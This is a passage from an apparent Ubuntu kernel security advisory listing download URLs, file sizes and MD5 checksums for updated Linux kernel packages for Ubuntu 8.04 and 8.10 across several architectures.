5450f2a8c3bb9dc1bd05399e4884e764\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   108512 8d7d316614dcb75277305f50f2f66310\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    32960 4ba131c497e30aae60b7c08ad1e91fdf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    33390 1f43b1ed2df0850139f25c266b865ac5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    60684 982bf0bbb3554f5bf15cee3b0f667d6c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    61154 6becce2fc9fca9ac242f67505afb31cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    82650 801dc2529d81d4cf7fc024988dc6dcce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    82960 912e4d26c1c1f71aa56fb828f39fd200\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    48526 dff0af69747021b3207cd81060880e44\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    48458 99bbfe23bd95188bdf21ca89ababc651\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:     8188 f0276785fc60ebd6d7261b517a0c8d3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:     8440 cd9c33f032973bfc9fd1ef6956266edc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    51108 1dfb52458d47c81516eecdda1a7c388d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    52942 fe3c6e062f3ce8ffe11d2f875ebcd401\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    92152 a69e8d73c99894351b3d6240339eb32f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    92440 e3948a2976aca9b6105f8aa5f71f47a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:  1443718 d00660a064bf060f629ce78e1d4abedb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:  1427006 586bde26554bf32873a8357740f88ef0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    43238 0684da1101af11c9b3fe3750a38de6b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    42806 34bf3e51745417cebd2ea596fa433bc6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    11404 86457f6b83a89e02e857d885cd1cf3cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    12016 d224a53c023006435c95ca2255e5928c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   471454 8ec2b608ed602c2823a71bf9a76347b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:   473356 919954de23b3b5f205ef21e4cfabad0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    70514 d89b662b7a144853c6fbc1d9ce3e939a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb\n      Size/MD5:    71382 8b8bb32b68a064f06ad01d00e2d0c213\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.68_i386.deb\n      Size/MD5: 20251706 3c1368f9786eedcfa84909b4369b46c0\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.68_i386.deb\n      Size/MD5: 18546208 c574c0ba71d87dea4ee61b369d402c59\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.68_i386.deb\n      Size/MD5: 18786092 812e5973c0684ee468a2af1dfd3770ce\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.68_lpia.deb\n      Size/MD5:   640380 66419ec10bab050af7db91dc09a05d61\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.68_lpia.deb\n      Size/MD5:   706332 facf8a262b488e24c9f82066a4beecf8\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_lpia.deb\n      Size/MD5:   708196 fd8eaf91f19d0db7b90158b85b9a4b47\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.68_lpia.deb\n      Size/MD5: 14517450 d95d9fef00a1dd58d58ff852a359cd46\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.68_lpia.deb\n      Size/MD5: 19822718 3d1467b01cfac713e23962e3afe7fcff\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   334056 2c0185e202b2ee98e180241aeef9eac9\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   318530 da1faf28b2e3b5ff42ede65cbc6bb7b4\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    62718 2f034ef64dba8f19457b384cfdc6c506\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    73004 02010621529a19ca7cd2c59bee6b8a65\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    41448 7b4c91974c6c57060a003f7cec23ea52\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    47828 665a6f1abdf5a8e559fb8c6fe4b7422c\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    89496 b1f411d42e2c510c37b8a7d80ce80583\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   105746 f4fcded5be6c38fd615ab54fe133f694\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    44830 1b504f5b8d242fa68e3c723a11970390\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    40932 daaa5482e126556c1d294bb45a618a6b\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   704812 a3478a3fdd0e65d6c14122381f0fcf09\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   771062 f21b052d6aeaf679f2b76f6eca4e8569\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   243316 2b6c5e07da92ff5091c75cc7ff841c05\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   246228 37f8d614856390770bc6c52d628e8786\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    69156 af8913d8c0c76f56ddf3e9ddeac80024\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   132586 449cbdf1563afdfafafd6c5639c4ae5d\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    70254 58835e1fc4291f4eb0c480721a304f76\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    77452 f157cd0a93a43348e31964a3cdd2e598\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   146272 fbf7a6ec42279729661e7bcb2adeb2a0\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   165004 b0e57a6126b30ff0a5549d48b3653432\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   388016 5c62d956894d6e2ebbfb8bb6ed0670bf\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   350458 77e7f9a0b26ba0add618a7e45d00a695\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:  2431532 f2e3b5d076bc2998253f28a3a00620be\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:  3473296 1472edab5674676d1155f04dfa3be5a3\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.68_powerpc.deb\n      Size/MD5:   653666 e73d24fa2b2a51c960a2efa02006fbaf\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.68_powerpc.deb\n      Size/MD5:   658806 223da03ca58d5590d932c735fdc91576\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.68_powerpc.deb\n      Size/MD5:   653624 1a2e6959b80b658fbd40e7749891cf46\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.68_powerpc.deb\n      Size/MD5: 20177426 8d0fad2c44885b8f892b370d9fab6ffc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.68_powerpc.deb\n      Size/MD5: 21379358 9680899f4cdaf11068cbacffc6de4903\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.68_powerpc.deb\n      Size/MD5: 19951618 87af3eeecd8a02416aec847eaf78c1a4\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_powerpc.deb\n      Size/MD5:   698360 f165e548a9bb971ec8defa20d3a9e1d3\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   266746 c97db9c8b65e3876115592530b3b72e6\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   307724 4e2b85869f1d5eb9cb303b577ddcffbb\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   192256 df43cd47b549fce25609ff4156873f85\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   201682 5d3d4b5fab4496844e93ec6d94613e1e\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   272034 46ee36417aa8e8a1153c8d700b0da72f\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   306002 5c2038831d2ab288253ca1c57ede5f30\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:  1807712 ee862a4950aaf3ddc6516a9f8f48d741\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:  2119348 9daf3f2b92e4f34e8f523dfc100de9f4\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   235196 181baa81a54929790493ff89ab3fcd20\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   225394 e4c0d08720ee49984e279c3a5621d992\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   170444 c0587d15145c95f7f5d54906332c6492\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   199748 8a1c62dbd766945a609345cd576d24f0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   117960 c8d68fdaf446c12f69a164476803fe8a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   139258 46d5d2a9faef3ddbe1f5a4c359778b1c\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    45376 158f3600a35f8ccd724f5b19a9d6d09f\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    46838 9fa15b63ea87ca5c5a79208df4ca8714\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    51136 ddfa3c272c81afaf249bcd4bf4ec1611\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    60298 091e98b3ac5d29e9ef7f6a90cc447984\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    74178 cfdda6157ac50d6e1484f1409da3c759\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    87216 85d0958bcdefad728964716ac578644e\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    76092 733309bdaaa071d7887aa958226678be\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    30230 83d1654507baba818e3b9dcd69eea2b7\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:     8488 051c32d0d4e5eb3aed799d23298f2385\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    10030 60c003e23d56e3e08f5895649f22bf77\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    57450 803cb5c2bcbf5e731d6340046e7828cc\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    68754 3849ee078bd14dfc8284ec5a183c2e1a\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   101182 98b5461ab5da300faaf7c1dbae055221\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   147834 80a406c225ce93579ceba4084e592526\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:  1565842 2bb8e544b976373f69ab64892a5c26d1\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:  1514622 79434a5f26e3b381c30ee9bc1da8462d\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    76672 02c6f630855e06043a11f366a6287577\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    85974 00168d3860a04a0725ce30d09dedc1b3\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    12704 cf3b0c2678baceb9a83b125debc2c299\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    14562 84cde7a173b96e12e01e0b51740fa8f2\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   450816 9a3bdc6c8911883f0206d73127797845\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   505314 5f4ec06646d33a8b1d94180b288f320c\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:    83684 71c29130c5b1c90fcf6e30d00e8a1b9e\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb\n      Size/MD5:   108846 f8ffd77938efdb8edfe987a225adab72\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:    59578 6f2a003bbf059004e8bffe2f9c5dd521\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:    71734 d5bab2e989f83b0c3849b72b05c2ae25\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:    42448 4865beae3050e6725033c53879bd37fa\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:    91782 1f78b301d8fc350eda15acf549122c58\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:   587180 cfe84f79bf1f2e3d90910db32f90e9d6\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:   171076 82a86f9bbc3a639a26501b017d9acfcb\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:    22362 ea35ad08431deacb64718b48c628ce9c\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:    46056 1d92935e02b0f7a7da2c86eb3abf3b53\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:   152976 7b571d87f9bbfc6c2283a394f4dda9e8\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:  2132312 c1bdd4c02c37520e2348c4f5c24b1cce\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.68_sparc.deb\n      Size/MD5:   566552 13239a88dba53dfd3bd338777b8fb1e2\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.68_sparc.deb\n      Size/MD5:   564864 af25b68291b3f63bc843c97ae544b02e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.68_sparc.deb\n      Size/MD5: 14097908 f69d61c50edb36757977aec8df161dbf\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.68_sparc.deb\n      Size/MD5: 13828920 4e1f81ccc1336091b04e1b6bf4aa4b93\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_sparc.deb\n      Size/MD5:   753250 a1c8d3d5bd0e16a482a173775615c3de\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:   270060 210d2a847159c1e98e9bc584f8e7ddfc\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:   190368 f6501c6995686fce8cb1498d7806fc95\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:   263034 011627fbd630d2c66947b1b30cb8e75f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:  1386432 a300d57dd07a9a8524802b07d27c0718\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:   175436 0fabf05b3d254c83501c59cf9768f86e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:   122106 3b51f301338c11c9b3c0d8cd5c56db5c\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:    40398 3d6e1455329396d28199ecffa5c4c821\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:    48052 14afb43ce40eb4a662e73cdf0f43df7f\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:     8696 ddc216c3c064f20854632902a320e3d0\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:    60514 4c21b11e75684445416ff28283de7dea\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:   106838 d13d597e7313f17548f1f7f4b4466bbc\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:  1002092 b2dac3e8a8590e879fe20649aa3731d3\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:     9520 235f012bdc6a0c78e788eb3c8a7a10f0\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:   391832 28a6e4dc23e04f46edc39ac352971914\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb\n      Size/MD5:    75926 149062e3e85ef9488756f4c7b96ae34d\n\nUpdated packages for Ubuntu 8.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.46.diff.gz\n      Size/MD5:  3290817 bc34db88612555d154e23206423412c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.46.dsc\n      Size/MD5:     2749 07c254518ef27ca0e5ce64069ad9e6a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz\n      Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.46_all.deb\n      Size/MD5:  3492674 e98ce22c3f225ced0d3c2723af239b94\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.46_all.deb\n      Size/MD5:  5906768 053607f65b1f6ed74d811e6fb61c3334\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.46_all.deb\n      Size/MD5: 52051202 197265e351585fd0bc238eea45315a39\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    36538 f7c7407633faa2c8d9007c3bb7ebe2e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   265216 60e8ef2d1537fa4a56015946fd1abd9c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    53440 ea24246514123457d146214f8338b484\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    43040 3aea92c7bbd3dff26e57d3bf7a6e92b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    52350 26d506b7e7ced6d5b76f2c2901f57215\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    89834 15f9dca2668d2b3c2216082ae93879f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    38184 30cf7f5b2879f141ef7f95c51867bf14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   677068 b29b6ccea0136d896d8da740312a6b70\n    